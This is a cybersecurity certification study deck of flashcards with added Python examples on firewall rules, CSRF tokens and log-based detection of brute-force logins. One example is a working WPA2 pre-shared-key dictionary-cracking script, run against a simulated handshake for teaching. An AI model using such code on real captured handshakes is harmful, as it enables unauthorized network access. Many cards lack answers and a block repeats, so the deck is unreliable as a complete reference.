What should IoT devices have instead of weak defaults?
Changed passwords
What is a key aspect of Mobile Device Management (MDM)?
Centralized management
What does BYOD stand for?
Bring Your Own Device
What is a challenge of BYOD?
Difficult to secure
What does COPE stand for?
Corporate Owned, Personally Enabled
What is CYOD?
Choose Your Own Device
What are common security concerns for cellular networks?
What should be done to secure a wireless network?
What is the WPA2 PSK problem?
Capturing the four-way handshake lets an attacker brute-force or dictionary-attack the pre-shared key (PSK) offline.
What is WPA3?
Wi-Fi Protected Access 3, introduced in 2018
What does GCMP stand for?
Galois/Counter Mode Protocol
What is SAE in WPA3?
Simultaneous Authentication of Equals, a new authentication process
What is a message integrity check (MIC)?
Verifies that received data matches the original sent data
What is a weak PSK vulnerable to?
Brute-force attacks, especially with improved technology
What is the purpose of WPA3's mutual authentication?
Creates a shared session key without sending it across the network
What is required for Open System wireless authentication?
No authentication password is required
What is the main feature of WPA3-Personal?
Uses a pre-shared key (PSK) for authentication
What do WPA2-Personal and WPA3-Personal use?
A pre-shared key (passphrase); everyone on the network uses the same 256-bit key derived from it.
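The WPA2 PSK problem and the weak-PSK cards above become concrete once you see how little the handshake hides. The following Python script is an added example (not from the original notes) that implements the WPA2-Personal key derivation with the standard library only: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 rounds), PTK = PRF-512 over the MAC addresses and nonces, and the HMAC-SHA1-128 MIC over EAPOL message 2. It then runs an offline dictionary attack against a simulated capture. The SSID, MAC addresses, nonces, wordlist and the simplified EAPOL frame layout are all constructed for this example, not taken from a real capture.

```python
import hashlib
import hmac

# Constructed handshake parameters (everything here is visible to a sniffer).
SSID = b"CoffeeShopWiFi"
AP_MAC = bytes.fromhex("001122334455")
STA_MAC = bytes.fromhex("66778899aabb")
ANONCE = bytes(range(32))        # AP nonce from message 1
SNONCE = bytes(range(32, 64))    # station nonce from message 2


def pmk_from_passphrase(passphrase: str, ssid: bytes) -> bytes:
    """WPA2-Personal: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 rounds, 32 bytes).

    The SSID is the only salt, so a table of PMKs can be precomputed per SSID.
    """
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid, 4096, 32)


def prf_512(key: bytes, label: bytes, data: bytes) -> bytes:
    """IEEE 802.11 PRF: HMAC-SHA1(key, label || 0x00 || data || i) blocks, truncated to 64 bytes."""
    out = b"".join(
        hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        for i in range(4)
    )
    return out[:64]


def derive_ptk(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PTK = PRF-512(PMK, "Pairwise key expansion", min/max of the MACs and nonces)."""
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    return prf_512(pmk, b"Pairwise key expansion", data)


def eapol_message2(snonce: bytes) -> bytes:
    """Simplified EAPOL-Key message 2 with the MIC field zeroed (constructed layout:
    header, descriptor type, key info, key length, replay counter, SNonce,
    IV/RSC/ID zeroed, 16-byte MIC zeroed, key-data length)."""
    header = bytes.fromhex("0103007a" "02" "010a" "0010" "0000000000000001")
    return header + snonce + b"\x00" * 32 + b"\x00" * 16 + b"\x00\x00"


def eapol_mic(kck: bytes, frame: bytes) -> bytes:
    """WPA2/CCMP MIC: HMAC-SHA1 over the frame (MIC field zeroed), truncated to 16 bytes."""
    return hmac.new(kck, frame, hashlib.sha1).digest()[:16]


def station_message2(passphrase: str):
    """What the station sends and the sniffer records: the frame and its MIC."""
    ptk = derive_ptk(pmk_from_passphrase(passphrase, SSID), AP_MAC, STA_MAC, ANONCE, SNONCE)
    frame = eapol_message2(SNONCE)
    return frame, eapol_mic(ptk[:16], frame)   # KCK is the first 16 bytes of the PTK


def crack_psk(frame: bytes, captured_mic: bytes, wordlist):
    """Offline dictionary attack: each guess is checked against the captured MIC with no
    further traffic to the access point, so lockouts and rate limits never trigger."""
    for guess in wordlist:
        ptk = derive_ptk(pmk_from_passphrase(guess, SSID), AP_MAC, STA_MAC, ANONCE, SNONCE)
        if hmac.compare_digest(eapol_mic(ptk[:16], frame), captured_mic):
            return guess
    return None


if __name__ == "__main__":
    wordlist = ["password", "letmein", "sunshine123", "qwerty"]   # constructed
    frame, mic = station_message2("sunshine123")
    print("weak PSK recovered :", crack_psk(frame, mic, wordlist))
    frame, mic = station_message2("7cJ#vQ9!pL2&wX")
    print("strong PSK recovered:", crack_psk(frame, mic, wordlist))
```

Only the PSK's strength limits this attack, because every other input is broadcast in the clear. WPA3-Personal's SAE exchange does not expose a value that can be checked against passphrase guesses this way, which is why it closes the offline attack.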
What does WPA3-Enterprise do?
Authenticates users individually with an authentication server (i.e., RADIUS).
What are the components of the AAA framework?
What is RADIUS?
A common AAA protocol that centralizes authentication for users.
What does IEEE 802.1X provide?
Port-based Network Access Control (NAC); access only after authentication.
What is EAP?
Extensible Authentication Protocol; an authentication framework with various methods.
What is the purpose of input validation?
To check that actual input matches what the application expects (type, length, format, range) and to reject or normalize anything that does not.
What are secure cookies?
Cookies with the Secure attribute set; the browser only sends them over HTTPS. Even so, sensitive data should not be stored in cookies.
What is Static Application Security Testing (SAST)?
A method to identify security flaws like buffer overflows and database injections.
What is code signing?
Digital signature of an application by the developer to confirm integrity and origin.
What is sandboxing?
Isolating applications so they cannot access unrelated resources.
What is a sandbox used for?
Where can sandboxing be applied?
What does application security monitoring provide?
What can be viewed in application security monitoring?
What is involved in the acquisition process?
What is asset tracking used for?
What should be included in asset monitoring?
What does enumerating an asset list involve?
What is the purpose of media sanitization?
What methods exist for physical destruction of data?
What is a certificate of destruction?
What is important about data retention?
What is vulnerability scanning?
What is static code analysis used for?
What is dynamic analysis (fuzzing)?
What is the issue with verifying findings in security?
False positives are an issue.
What is dynamic analysis in security testing?
Sending random input to an application.
What are the types of testing involved in dynamic analysis?
What does dynamic analysis look for?
Who created the Fuzz Generator?
Professor Barton Miller at the University of Wisconsin.
What is the CERT Basic Fuzzing Framework?
A framework developed by Carnegie Mellon Computer Emergency Response Team.
What is the purpose of package monitoring?
To confirm the package is legitimate and safe before deployment.
What is threat intelligence?
Research on threats and threat actors.
What is OSINT?
Open-source intelligence from publicly available sources.
What does proprietary/third-party intelligence provide?
Compiled threat information that can be purchased.
What is the function of the Cyber Threat Alliance (CTA)?
Members share and validate threat intelligence submissions.
What is penetration testing (pentest)?
Simulating an attack to exploit vulnerabilities.
What is included in the rules of engagement?
Defines purpose, scope, and test parameters.
What can exploiting vulnerabilities lead to?
What can buffer overflows cause?
What are some vulnerability types to test?
What is a false positive?
A vulnerability is identified that doesn’t really exist.
What is a false negative?
A vulnerability exists, but you didn’t detect it.
What is CVSS?
Common Vulnerability Scoring System - scoring of a vulnerability from 0 to 10.
What is the National Vulnerability Database?
A synchronized database with the CVE list, providing enhanced search functionality.
What is the exposure factor?
Loss of value or business activity if the vulnerability is exploited, expressed as a percentage.
What are the steps in penetration testing?
What is responsible disclosure?
A controlled release of information about a vulnerability after a fix is created.
What are bug bounty programs?
Rewards for discovering vulnerabilities, allowing researchers to earn money for documenting them.
What does vulnerability classification involve?
Scanners look for signatures in application scans, web application scans, and network scans.
What are the environmental variables in vulnerability analysis?
What is the impact of industry/organization on vulnerabilities?
What is risk tolerance in security?
What is the most common mitigation technique for vulnerabilities?
What are the types of patches?
What does cybersecurity insurance cover?
What is segmentation in security?
What is the purpose of logical segmentation with VLANs?
What are compensating controls?
Why is security monitoring essential?
What does log aggregation involve?
What are the types of users for remote access systems?
What do firewall and IPS reports indicate?
What is the function of a SIEM?
What does log aggregation enable?
What is crucial in a constantly changing threat landscape?
What should be actively checked in systems?
What is the average time to identify and contain a breach?
About 9 months (IBM security report, 2022)
What is an exception in vulnerability management?
What is required after a vulnerability is patched?
What is essential for ongoing vulnerability management?
What are the methods for notification in security alerting?
What is the purpose of alert tuning?
What is SCAP used for?
How can SCAP content be utilized?
What does SCAP stand for?
Security Content Automation Protocol
What can SCAP content be shared between?
Tools
What does SCAP focus on?
Configuration compliance
What is a key benefit of SCAP in large environments?
Detect applications with known vulnerabilities
What are some types of automation in SCAP?
What should benchmarks apply to?
What is an example of a mobile device security setting?
Disable screenshots
What is the role of agents in compliance checks?
Install software agent onto the device
What is an advantage of agentless checks?
Runs without a formal install
What does SIEM stand for?
Security Information and Event Management
What does anti-malware software stop?
Spyware, ransomware, fileless malware
What does DLP stand for?
Data Loss Prevention
What does SNMP stand for?
Simple Network Management Protocol
What is the purpose of SNMP traps?
Communicate alerts without constant polling
What does NetFlow gather?
Traffic statistics from all traffic flows
What is a vulnerability scanner used for?
Identify systems and security devices on the network and check them for known vulnerabilities, from both outside and inside.
What is the purpose of firewalls?
What are the two types of firewalls?
What does NGFW stand for?
Next-generation firewall
What layer does an NGFW operate at?
OSI Application Layer (Layer 7)
What is Network Address Translation (NAT)?
Converts private IP addresses to public IP addresses
What is the function of Access Control Lists (ACLs)?
Allow or disallow traffic based on criteria
What is the purpose of a screened subnet?
Provides an additional layer of security between the network and the Internet
What are the two methods for finding malicious traffic in IPS?
What does implicit deny mean in firewall rules?
Traffic not explicitly allowed is denied
What is the role of VPN in firewalls?
Encrypts traffic between sites
What is deep packet inspection?
Analyzes every packet for security decisions
What protocols are commonly used in firewalls for forwarding decisions?
What port does a web server typically use?
tcp/80, tcp/443
What port does SSH use?
tcp/22
What port does Microsoft RDP use?
tcp/3389
What port does a DNS query use?
udp/53
What port does NTP use?
udp/123
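The firewall cards above (ACLs, implicit deny, screened subnet, and the common ports) describe a rule base evaluated top-down. The following Python script is an added example (not from the original notes) of a minimal layer-4 packet filter that evaluates such a rule base: first match wins and anything unmatched is dropped by the implicit deny. The addresses, the screened-subnet layout and the rules are constructed for this example.

```python
from dataclasses import dataclass
from ipaddress import ip_address, ip_network
from typing import Optional


@dataclass
class Rule:
    action: str            # "allow" or "deny"
    proto: str             # "tcp", "udp" or "any"
    src: str               # source CIDR
    dst: str               # destination CIDR
    dport: Optional[int] = None   # None = any destination port


@dataclass
class Packet:
    proto: str
    src: str
    dst: str
    dport: int


INTERNET = "0.0.0.0/0"

# Constructed rule base: 203.0.113.0/24 is the screened subnet with the public web
# server and DNS resolver, 10.0.0.0/8 is the internal network, 10.1.2.0/24 the admins.
RULES = [
    Rule("allow", "tcp", INTERNET, "203.0.113.10/32", 80),       # public web server
    Rule("allow", "tcp", INTERNET, "203.0.113.10/32", 443),
    Rule("allow", "udp", "10.0.0.0/8", "203.0.113.53/32", 53),   # internal hosts -> resolver
    Rule("allow", "udp", "10.0.0.0/8", INTERNET, 123),            # NTP out
    Rule("allow", "tcp", "10.1.2.0/24", "203.0.113.10/32", 22),   # SSH from admin subnet only
    Rule("deny", "tcp", INTERNET, "10.0.0.0/8", 3389),           # explicit, logged RDP block
]


def matches(rule: Rule, pkt: Packet) -> bool:
    """Layer-4 match: protocol, source/destination network, destination port."""
    return (rule.proto in ("any", pkt.proto)
            and ip_address(pkt.src) in ip_network(rule.src)
            and ip_address(pkt.dst) in ip_network(rule.dst)
            and (rule.dport is None or rule.dport == pkt.dport))


def first_match(rules, pkt: Packet) -> Optional[int]:
    """Index of the first rule that matches, or None (order matters: an early broad
    allow shadows every later deny)."""
    for i, rule in enumerate(rules):
        if matches(rule, pkt):
            return i
    return None


def decide(rules, pkt: Packet) -> str:
    """First matching rule decides; if nothing matches, implicit deny."""
    i = first_match(rules, pkt)
    return rules[i].action if i is not None else "deny"


if __name__ == "__main__":
    samples = [  # constructed flows
        Packet("tcp", "198.51.100.7", "203.0.113.10", 443),   # web from the Internet
        Packet("tcp", "198.51.100.7", "203.0.113.10", 22),    # SSH from the Internet
        Packet("tcp", "10.1.2.5", "203.0.113.10", 22),        # SSH from an admin host
        Packet("tcp", "198.51.100.7", "10.0.0.5", 3389),      # RDP into the LAN
        Packet("udp", "10.0.0.5", "203.0.113.53", 53),        # internal DNS query
    ]
    for pkt in samples:
        i = first_match(RULES, pkt)
        print(f"{pkt.proto}/{pkt.dport} {pkt.src} -> {pkt.dst}: {decide(RULES, pkt)}"
              f" (rule {i if i is not None else 'implicit'})")
```

The SSH-from-the-Internet flow is dropped without any rule naming it, which is the implicit deny at work; the explicit RDP deny only exists so that the drop is logged rather than silent.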
What does authorization determine?
What access you have based on your identification and authentication.
What is a Certificate Authority (CA)?
An organization that creates and digitally signs certificates for devices.
What does an authorization model help with?
It defines access rights by Roles, Organizations, Attributes, etc.
What are key elements of a Zero Trust approach?
What is the Zero Trust principle?
Everything must be verified. Nothing is inherently trusted. Use multi-factor authentication and encryption.
What are the planes of operation in networking?
What is a Policy Enforcement Point (PEP)?
The gatekeeper that allows, monitors, and terminates connections.
What is the role of a Policy Engine?
Evaluates access decisions based on policy and other information.
What are security zones?
Categorize access based on trust levels: trusted, untrusted, internal, external.
What is the purpose of fencing in physical security?
Build a perimeter to prevent unauthorized access.
What is the purpose of physical protection at the reception area?
Validates identification of existing employees
What is two-person integrity/control?
Minimizes exposure to an attack; no single person has access to a physical asset
What should an access badge include?
What is the function of infrared sensors?
Detects infrared radiation in both light and dark; common in motion detectors
What is the purpose of honeypots?
Attracts attackers and traps them; creates a virtual world to explore
What are honeynets?
A real network that includes multiple devices; builds a larger deception network
What are honeyfiles?
Files with fake information designed to attract attackers; alerts sent if accessed
What is change management?
Process for making changes like upgrades, patches, or configuration changes
What is the change approval process?
Formal process to manage change; includes request forms, risk analysis, and approvals
What is the role of ownership in change management?
An individual manages the change process; ensures the process is followed
Who are considered stakeholders in change management?
Individuals or groups impacted by the change; they provide input
What should be upgraded for shipping?
What risks can occur without change?
What is the standard operating procedure for change management?
What is required after implementing new configurations?
What can you do to recover from a power outage?
What should you do with legacy applications?
What are dependencies in system management?
What is Public Key Infrastructure (PKI)?
What is asymmetric encryption?
What is important when managing encryption keys?
What is the significance of cryptographic keys?
They determine the output of encrypted data, hash values, and digital signatures.
What does a Trusted Platform Module (TPM) provide?
What is a Hardware Security Module (HSM) used for?
What are common steganography techniques?
What is a public key certificate?
Binds a public key with a digital signature and other details about the key holder.
What does a digital signature add?
Adds trust; PKI uses Certificate Authorities for additional trust.
What are typical details in a digital certificate?
What is a Certificate Signing Request (CSR)?
A request sent to the CA containing a public key to be signed.
What are self-signed certificates?
Internal certificates not signed by a public CA; used within an organization.
What is a wildcard certificate?
One certificate that covers all hostnames at one level of a domain (e.g., *.example.com), so it applies to many server names in that domain.
What is OCSP stapling?
Status information is stored on the certificate holder’s server and stapled into the SSL/TLS handshake.
What are the steps to create a certificate?
What are the motivations of threat actors?
What defines nation-state attackers?
Government entities with massive resources and high sophistication.
What characterizes unskilled attackers?
Run pre-made scripts, motivated by disruption or data exfiltration.
What is an insider threat?
Internal entity motivated by revenge or financial gain, with institutional knowledge.
What is organized crime in cybersecurity?
Professional criminals motivated by money, often very sophisticated.
What is the risk of open service ports?
What is the significance of cloud usage in Shadow IT?
How to protect against impersonation?
What is a watering hole attack?
What is required for executing a watering hole attack?
What happened in January 2017?
What is misinformation/disinformation?
What is a race condition?
A programming issue where two or more processes or threads act on the same resource at the same time, so the result depends on timing (e.g., time-of-check to time-of-use); the outcome can be errors or a security bypass.
What can cause a reboot loop in systems?
Improper handling of file system problems, as seen in the Mars rover 'Spirit'.
What should you always do when installing software updates?
Keep your operating system and applications updated.
What should you do to verify app updates?
Visit the developer’s site directly - Don’t trust random update buttons or files
What do many operating systems require for apps?
They require signed apps - Don't disable security controls
What is the Solarwinds Orion supply chain attack?
Attackers added malicious code to updates - Reported in December 2020
What vulnerabilities were reported on May 9, 2023?
What is SQL injection (SQLi)?
Putting your own SQL requests into an application - Shouldn't be allowed
What is a non-persistent (reflected) XSS attack?
Web site allows scripts in user input - Attacker emails a link with malicious script
What is a persistent (stored) XSS attack?
Attacker posts a message with payload - Everyone viewing the page gets it
What is the payload in a stored XSS attack?
The script the attacker posted; it runs in the browser of everyone who views the page, which is why the attack is 'persistent'.
What happens when someone views the malicious message?
The script runs with their session and can repost itself to their own page, propagating like a worm.
What vulnerability did Aaron Guzman discover in Subaru?
A token that never expires, allowing unauthorized access.
What is a potential risk of a valid token?
Allows any service request, including adding an email to another's account.
How can you protect against XSS?
What is a significant concern regarding technology EOSL?
Lack of security patches and updates for unsupported products.
What are virtualization vulnerabilities?
What happened in March 2017 at Pwn2Own?
What should be included with the contract for service providers?
Ongoing security audits of all providers
What are challenges in mobile device security?
How can you protect against ransomware?
How can you protect against spyware?
How can you remove bloatware?
What can malware log?
What happened on March 19, 2013 in South Korea?
Email with malicious attachment sent; Trojan installed malware.
What did the malware do on March 20, 2013?
Activated logic bomb, deleted storage and master boot record.
How can you prevent a logic bomb?
What is a rootkit?
A malicious software that modifies core system files and is often invisible to the OS.
How can you find and remove rootkits?
What are physical attacks?
Attacks that bypass digital security by gaining physical access to systems.
What is brute force in physical security?
Physically pushing through obstructions without needing a password.
What are environmental attacks?
Attacks targeting the operating environment, like HVAC and power systems.
What is a Denial of Service (DoS) attack?
An attack that overloads a service to make it unavailable.
What is a Distributed Denial of Service (DDoS) attack?
Using many computers (often a botnet) to overwhelm a service with a traffic spike it cannot absorb.
What is a wireless deauthentication attack?
A DoS attack that disconnects users from a wireless network.
What does wireless jamming do?
Prevents wireless communication - Transmits interfering signals - Decreases signal-to-noise ratio
What is the difference between interference and jamming?
Interference is unintentional - Jamming is intentional disruption
What is an on-path attack?
Formerly known as man-in-the-middle - Redirects traffic without detection
What is a replay attack?
An attacker reuses transmitted information - Requires raw network data access
What are browser cookies?
Stored information by the browser - Used for tracking and session management
What is session hijacking?
An attacker intercepts a session ID - Gains access using victim's credentials
What is pass the hash?
An attacker captures username and password hash - Uses them to authenticate as the victim
What is malicious code?
Code used to exploit vulnerabilities - Can be delivered through various techniques
What are ways to get into a well-secured system?
What protects against malicious code?
What is WannaCry ransomware?
What is SQL injection?
What is a replay attack?
What is privilege escalation?
What mitigates privilege escalation?
What is the purpose of bounds checking?
What is the role of HTTPS in security?
What is the CVE-2023-29336 vulnerability?
Which systems are affected by Win32k Kernel driver vulnerability?
What is Cross-site Request Forgery (CSRF)?
One-click attack that exploits user trust in a web application.
What is a significant oversight in web application development regarding CSRF?
Lack of anti-forgery techniques.
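The CSRF cards above point at the missing anti-forgery technique without showing it. The following Python script is an added example (not from the original notes) of a session-bound anti-forgery token: the server issues a nonce plus an HMAC over the session ID and nonce, and a state-changing handler refuses any request whose form does not carry a token valid for the session in the cookie. The request dictionaries, the server key and the handler are constructed for this example; a framework would wire the same check into its form handling.

```python
import hashlib
import hmac
import secrets

# Server-side key, generated here for the example; production keys come from a key store.
SECRET_KEY = secrets.token_bytes(32)


def issue_csrf_token(session_id: str) -> str:
    """token = nonce.HMAC(key, session_id:nonce).

    The attacker's page cannot read the victim's cookie or page contents (same-origin
    policy), so it can neither learn this token nor compute one for the session.
    """
    nonce = secrets.token_hex(16)
    tag = hmac.new(SECRET_KEY, f"{session_id}:{nonce}".encode(), hashlib.sha256).hexdigest()
    return f"{nonce}.{tag}"


def verify_csrf_token(session_id: str, token: str) -> bool:
    """Recompute the tag for this session and compare in constant time."""
    nonce, sep, tag = token.partition(".")
    if not sep:
        return False
    expected = hmac.new(SECRET_KEY, f"{session_id}:{nonce}".encode(), hashlib.sha256).hexdigest()
    return hmac.compare_digest(expected, tag)


def handle_transfer(request: dict) -> str:
    """State-changing POST handler. The browser attaches the session cookie to a forged
    request automatically, so the cookie alone does not prove the user meant to act."""
    session_id = request["cookies"].get("session")
    if session_id is None:
        return "401 not logged in"
    if not verify_csrf_token(session_id, request["form"].get("csrf_token", "")):
        return "403 forged request rejected"
    return f"200 transferred {request['form']['amount']} to {request['form']['to']}"


if __name__ == "__main__":
    sid = "sess-7f3a"   # constructed session identifier
    token = issue_csrf_token(sid)
    legit = {"cookies": {"session": sid},
             "form": {"csrf_token": token, "amount": "100", "to": "bob"}}
    forged = {"cookies": {"session": sid},             # cookie rides along automatically
              "form": {"amount": "5000", "to": "attacker"}}   # no token: attacker never saw one
    print("legitimate:", handle_transfer(legit))
    print("forged    :", handle_transfer(forged))
```

Binding the token to the session (rather than using a static per-site value) means a token an attacker obtains for their own session is useless against the victim's.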
What vulnerability did the POODLE attack exploit?
A padding-oracle flaw in SSL 3.0 (CVE-2014-3566); attackers forced clients to fall back from TLS to SSL 3.0 so it could be exploited.
What should you do if your application saves passwords as plaintext?
Get a better application that hashes passwords.
What is a brute force attack?
Trying every possible password combination until the correct one is found.
What happens during an online brute force attack?
Attempts to log in repeatedly, often leading to account lockouts.
What is an indicator of compromise (IOC)?
An event indicating a potential intrusion, such as unusual network activity.
What can cause an account lockout?
Exceeded login attempts or administrative disabling of the account.
What does concurrent session usage refer to?
Multiple logins from different locations by the same user.
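The brute-force, lockout and concurrent-session cards above are indicators of compromise that a SIEM or log-aggregation pipeline turns into alerts. The following Python script is an added example (not from the original notes) that parses a handful of constructed authentication log lines and applies two detections: a sliding-window count of failed logins per account (online brute force) and successful logins for one account from two different locations within a short window (concurrent sessions). The log format, thresholds and sample events are this example's own assumptions.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample log lines (not from a real system).
SAMPLE_LOG = """\
2024-05-01 08:00:01 login user=bob result=fail ip=198.51.100.7 geo=Paris
2024-05-01 08:00:03 login user=bob result=fail ip=198.51.100.7 geo=Paris
2024-05-01 08:00:04 login user=bob result=fail ip=198.51.100.7 geo=Paris
2024-05-01 08:00:06 login user=bob result=fail ip=198.51.100.7 geo=Paris
2024-05-01 08:00:07 login user=bob result=fail ip=198.51.100.7 geo=Paris
2024-05-01 08:00:09 login user=bob result=fail ip=198.51.100.7 geo=Paris
2024-05-01 08:05:00 login user=alice result=success ip=203.0.113.5 geo=Berlin
2024-05-01 08:12:00 login user=alice result=success ip=192.0.2.44 geo=Lagos
2024-05-01 09:00:00 login user=carol result=fail ip=203.0.113.9 geo=Madrid
2024-05-01 09:30:00 login user=carol result=success ip=203.0.113.9 geo=Madrid
"""

LINE = re.compile(r"^(\S+ \S+) login user=(\S+) result=(\S+) ip=(\S+) geo=(\S+)$")


def parse(log_text: str):
    """Turn raw lines into event dicts; unparseable lines are skipped (aggregated feeds are noisy)."""
    events = []
    for line in log_text.splitlines():
        m = LINE.match(line)
        if not m:
            continue
        ts, user, result, ip, geo = m.groups()
        events.append({"ts": datetime.strptime(ts, "%Y-%m-%d %H:%M:%S"),
                       "user": user, "result": result, "ip": ip, "geo": geo})
    return events


def detect_brute_force(events, threshold=5, window=timedelta(seconds=60)):
    """Online brute force: at least `threshold` failures for one account inside a sliding window.

    Returns the set of accounts that tripped the rule (the same condition a lockout policy keys on).
    """
    alerts = set()
    recent = defaultdict(deque)
    for e in events:
        if e["result"] != "fail":
            continue
        q = recent[e["user"]]
        q.append(e["ts"])
        while q and e["ts"] - q[0] > window:
            q.popleft()
        if len(q) >= threshold:
            alerts.add(e["user"])
    return alerts


def detect_concurrent_sessions(events, window=timedelta(minutes=30)):
    """Same account successfully logged in from two different locations close together in time."""
    alerts = set()
    last_success = {}
    for e in events:
        if e["result"] != "success":
            continue
        prev = last_success.get(e["user"])
        if prev and prev["geo"] != e["geo"] and e["ts"] - prev["ts"] <= window:
            alerts.add((e["user"], prev["geo"], e["geo"]))
        last_success[e["user"]] = e
    return alerts


if __name__ == "__main__":
    events = parse(SAMPLE_LOG)
    print("brute force     :", detect_brute_force(events))
    print("concurrent use  :", detect_concurrent_sessions(events))
```

The thresholds are where alert tuning happens: the same rule with a one-failure threshold would page on every typo, while a window measured in days would miss a slow, spread-out attack. Tune them against your own baseline before trusting the alert volume.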
Why would an attacker block content on a compromised system?
To remain undetected; for example, blocking connections to anti-malware update servers or security sites so the compromise is not found.
What is a common reason attackers want to stay in a system?
What should you look for to prevent blocked content?
What is the purpose of access control lists (ACLs)?
What can be included in ACL configurations?
What should be monitored for signs of an attack?
What should be included in extensive checks during configuration enforcement?
What is a host-based firewall?
What does a host-based Intrusion Prevention System (HIPS) do?
What should you do with open ports and services?
Why should you change default passwords?
What is the risk of unnecessary software?
What is a cloud responsibility matrix?
What are hybrid cloud considerations?
What is infrastructure as code?
What are microservices?
What is a monolithic application?
One big application that does everything, containing user interface, business logic, and data input/output.
What are APIs used for in microservices?
APIs serve as the 'glue' for microservices, allowing them to work together as a single application.
What are the benefits of microservices?
What is physical isolation in network infrastructure?
Devices are physically separate, requiring direct connections or switches for communication.
What is the purpose of VLANs?
VLANs provide logical segmentation, separating networks without physical isolation.
What are the three planes of SDN?
What is a centralized approach in security management?
Centralizes security management for correlated alerts and consolidated log analysis.
What is virtualization?
Running multiple operating systems on the same hardware, with each application instance having its own OS.
What are the challenges of a monolithic architecture?
Large codebase and change control challenges due to everything being in one application.
How do the parts of a microservice-based application fit together?
Clients call APIs, which route requests to the individual microservices; each service handles one function and they share data stores as needed.
What are the security concerns between on-premises and cloud?
On-premises offers full control but higher costs; cloud is centralized and generally less expensive.
What is an application container?
A standardized unit of software containing everything needed to run an application.
What is a real-time operating system (RTOS)?
An OS with a deterministic processing schedule, critical for industrial equipment.
What defines embedded systems?
Hardware and software designed for a specific function or part of a larger system.
What is high availability (HA)?
Systems that are always on and available, often requiring redundancy.
What is the importance of availability in IT?
System uptime is crucial for accessing data and completing transactions.
What does resilience refer to in IT?
The ability to maintain availability and recover quickly after an incident.
What factors contribute to cost in IT infrastructure?
Initial installation, ongoing maintenance, and repair costs.
What are common vulnerabilities in security?
How to minimize the attack surface?
What contributes to security?
What is the difference between active and passive monitoring?
What does an Intrusion Prevention System (IPS) do?
Watches network traffic and stops intrusions before they enter the network.
What is the function of a proxy?
Sits between users and external networks to handle requests on behalf of users.
What is an open proxy?
A third-party, uncontrolled proxy that can pose significant security concerns.
What is an application proxy?
A proxy that understands how an application works, often used for HTTP.
What is a forward proxy?
An 'internal proxy' used to protect and control user access to the Internet.
What is port security?
Authentication methods to control access on networks, used in both wired and wireless networks.
What is IEEE 802.1X?
Port-based Network Access Control (NAC) that requires authentication before network access.
What are the roles in IEEE 802.1X?
What is load balancing?
Distributing load across multiple servers to ensure fault tolerance and performance.
What is active/active load balancing?
All servers are active and share the load; provides fault tolerance and fast convergence.
What is active/passive load balancing?
Some servers are active while others are standby; passive servers take over if active ones fail.
What are sensors in networking?
Devices that aggregate information from network devices, like intrusion prevention systems and logs.
What are collectors in networking?
Devices that gather data from sensors, such as SIEM consoles and syslog servers.
What is the role of a firewall?
Controls the flow of network traffic, protecting sensitive materials and controlling content.
What is the difference between OSI layer 4 and OSI layer 7?
What is the purpose of a web application firewall (WAF)?
What does a Unified Threat Management (UTM) appliance include?
What is the role of a VPN concentrator?
What are the types of data classifications?
What types of financial information exist?
What is the difference between human-readable and non-human readable data?
What does classifying sensitive data involve?
What are the data classifications?
What is Proprietary data?
Data that is the property of an organization, may include trade secrets, often unique to an organization.
What is included in PHI?
Health information associated with an individual, including health status and care records.
What is data in transit?
Data transmitted over a network (also known as data in motion); requires transport encryption.
What is data in use?
Data actively being processed in memory; usually decrypted, so it can be vulnerable to attacks.
What is data sovereignty?
Data residing in a country is subject to that country's laws, including GDPR regulations.
What is geolocation used for?
Tracks location details; can be used to manage data access based on user location.
What is geofencing?
Automatically allows or restricts access based on user location, e.g., office proximity.
What is the purpose of encryption?
To encode information into unreadable data, converting plaintext to ciphertext.
What is hashing?
Represents data as a short string of text, a one-way trip creating a message digest.
What is a key feature of hashing?
It's a one-way trip; impossible to recover the original message from the digest.
How is tokenization used in credit card processing?
Uses a temporary token during payment to prevent misuse of captured card numbers.
What is the benefit of segmentation?
Separating data to reduce risk of a single breach affecting all data.
What is the purpose of load balancing?
Distributing load across multiple servers to optimize performance.
What is a hot site?
What is a warm site?
What is platform diversity?
What is continuity of operations planning (COOP)?
What is the role of people in capacity planning?
What is a snapshot in backup?
What is replication in data backup?
What is journaling in data storage?
What are secure baselines?
How should you deploy baselines?
Why is hardening important?
What is critical for mobile devices security?
What is essential for workstations security?
What are common security concerns for cellular networks?
What should be done to secure a wireless network?
What is the WPA2 PSK problem?
Brute-force attack on the pre-shared key (PSK) using the four-way handshake
What is the purpose of WPA3's mutual authentication?
Creates a shared session key without sending it across the network
What does WPA3-Personal use?
WPA2 or WPA3 with a pre-shared key; everyone uses the same 256-bit key.
What does WPA3-Enterprise do?
Authenticates users individually with an authentication server (e.g., RADIUS).
What are the components of the AAA framework?
What does IEEE 802.1X provide?
Port-based Network Access Control (NAC); access only after authentication.
What is the purpose of input validation?
To validate actual input against expected input and correct it.
What are secure cookies?
Cookies with the Secure attribute; sent only over HTTPS, but still not suitable for storing sensitive data.
What is Static Application Security Testing (SAST)?
A method to identify security flaws like buffer overflows and database injections.
What is code signing?
Digital signature of an application by the developer to confirm integrity and origin.
What is a sandbox used for?
What does application security monitoring provide?
What can be viewed in application security monitoring?
What is involved in the acquisition process?
What is asset tracking used for?
What should be included in asset monitoring?
What is the purpose of media sanitization?
What methods exist for physical destruction of data?
What is static code analysis used for?
What are the types of testing involved in dynamic analysis?
What is the CERT Basic Fuzzing Framework?
A fuzzing framework developed by the Carnegie Mellon Computer Emergency Response Team (CERT).
What is the purpose of package monitoring?
To confirm the package is legitimate and safe before deployment.
What does proprietary/third-party intelligence provide?
Compiled threat information that can be purchased.
What is the function of the Cyber Threat Alliance (CTA)?
Members share and validate threat intelligence submissions.
What are some vulnerability types to test?
What is the National Vulnerability Database?
A database synchronized with the CVE list, providing enhanced search functionality.
What is the exposure factor?
Loss of value or business activity if the vulnerability is exploited, expressed as a percentage.
What are the steps in penetration testing?
What is responsible disclosure?
A controlled release of information about a vulnerability after a fix is created.
What are bug bounty programs?
Rewards for discovering vulnerabilities, allowing researchers to earn money for documenting them.
What does vulnerability classification involve?
